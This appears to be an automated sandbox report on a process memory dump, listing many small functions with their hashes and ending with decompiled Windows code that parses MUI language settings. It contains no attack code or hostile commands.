Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 009B010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 009B1148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 009AF8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 009AF938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 009B1930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 009AFAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 009AFA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 009AFA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 009AFBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 009AFB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 009AFC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 009AFC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 009B0C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 009B1D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 009AFD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 009AFE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 009AFFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 009AFF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 009D8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E009D8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E009D8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E009BE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E009D718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E009D8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E009D718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E009D8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E009D8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E009D8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E009D718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E009BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E009B2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E009CE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E009BE2A8(_t322,  &_v68, _v16);
								if(E009D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E009CE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E009BE2A8(_t322,  &_v68, _t236);
								if(E009D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E009BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E009D718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E009BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E009B2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E009CE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
